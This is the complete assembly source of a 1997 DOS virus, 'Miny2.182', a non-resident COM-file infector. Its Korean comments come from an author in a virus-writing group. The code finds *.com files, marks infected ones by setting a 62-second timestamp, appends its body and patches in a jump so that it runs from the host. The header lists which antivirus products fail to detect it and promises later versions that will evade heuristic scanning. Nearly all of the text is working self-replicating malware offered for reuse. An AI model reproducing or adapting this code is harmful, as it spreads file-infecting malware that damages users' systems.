;<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
;
;                                                               CVC #02  97/09
; Virus Name : Miny2.182
; Original Author : KOV (Knight Of Virus) of SVS,COREA
; Author : Osiris of CVC,COREA
; Date : 1997/08/17
;
; Type : Non-resident COM infector
;
; 비상주형 기생형 바이러스이다. Miny2 샘플를 디스어셈블해서 소스로 만든후 약
; 간 개조를 했다.
; Miny2 시리즈로 비상주바이러스의 여러가지기법을 여러분에게 선 보이고자 한다.
;
; 가장 간단한 비상주기생형 바이러스의 모습이다.
; 다음과 같은 문제점이있다.
;
; 1. 에러 처리를 하지 않았다.
; 2. TBSCAN 의 인공지능패턴에 검색이된다.
; 3. COM 확장자를 가진 EXE 파일도 감염 시켜 버린다.
;
; 이런 문제점은 계속 공개할 Miny2 에서 개선해 나갈 것이다.
;
; AVP 970812 : PS-MPC based
; FINDVIRU 7.73 : VCLb
; F-PROT 2.72a,PCSCAN 315,V3,SCAN 9708 : 진단 못함
; TBAV : Howard
;
;<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
            .MODEL  TINY
            .CODE

 Miny2:     nop                         ; 쓰레기값 (아무일도 안한다.)
            nop                         ; 앞부분 복구시 바이러스가 파괴되기
            nop                         ; 때문에 이 값을 넣었다.
 start:
            call  Next                  ;
 Next:      pop   bp                    ;
            sub   bp,offset Next        ; BP = 바이러스 시작지점

            lea   si,COM_head[BP]       ;
            mov   di,100h               ; COM 의 앞부분을 복구한다.
            push  di                    ;
            movsw                       ;
            movsb                       ;

            mov   cx,0080h              ; DTA 로 사용해 PSP 가 파괴되므로
            mov   si,0080h              ; 잠시 저장한다.
            lea   di,End_Virus[BP]      ;
            repz  movsb                 ;

            mov   ah,4Eh                ; 파일 찾기
            mov   cx,00100011B
            lea   dx,Match_COM[BP]
 Find:      int   21h
            jnc   ChkInfected           ;
 Restart:
            lea   si,End_Virus[BP]      ; 원래 DTA 복구
            mov   di,0080h
            mov   cx,0080h
            repz  movsb
            RET

 ChkInfected:                           ; 감염 여부를 확인한다.
            mov   al,DS:[0096h]         ; 62 초 인지 검사한다.
            and   al,1Fh
            cmp   al,1Fh
            jnz   Infect
            mov   ah,4Fh                ; 다음 파일 찾기
            jmp   Find
 Infect:
            mov   ax,4301h              ; 읽기/쓰기 속성으로 바꿈
            xor   cx,cx
            mov   dx,009Eh
            int   21h

            mov   ax,3D02h              ; 파일 오픈
            int   21h

            xchg  ax,bx                 ; 파일 핸들 얻기

            mov   ax,5700h              ; 파일 작성 시간 얻기
            int   21h

            push  cx                    ; 작성 시간 저장
            push  dx                    ;

            mov   ah,3Fh                ; 앞부분 읽기
            lea   dx,COM_Head[BP]       ; 버퍼 주소
            mov   cx,0003               ; 3 바이트
            int   21h

            mov   al,02                 ; 파일 끝으로 이동
            call  lseek

            sub   ax,3                  ; 점프값 계산
            mov   word ptr JumpCode[BP+1],ax     ;

            mov   ah,40h                ; 바이러스 쓰기
            mov   cx,offset End_virus - 3 - 2
            lea   dx,start[BP]
            int   21h

            mov   al,00                 ; 처음으로 이동
            call  lseek

            mov   ah,40h                ; 점프 코드 쓰기
            mov   cx,0003
            lea   dx,JumpCode[BP]
            int   21h

            pop   dx                    ; 파일 작성 시간 복구
            pop   cx                    ;
            or    cx,+1Fh               ; 62 초로 만들기
            mov   ax,5701h              ;
            int   21h

            mov   ah,3Eh                ; 파일 닫기
            int   21h
            jmp   Restart


 lseek:                                 ;
            xor   cx,cx
            xor   dx,dx
            mov   ah,42h
            int   21h
            ret

 COM_head   db    0CDh,20h,90h          ; COM 앞부분
 Match_COM  db    '*.com',00            ; COM 파일 찾기
            db    'Miny2'               ; 미니 2
 JumpCode   db    0E9h
            db    ?,?
 End_Virus:

            END   Miny2

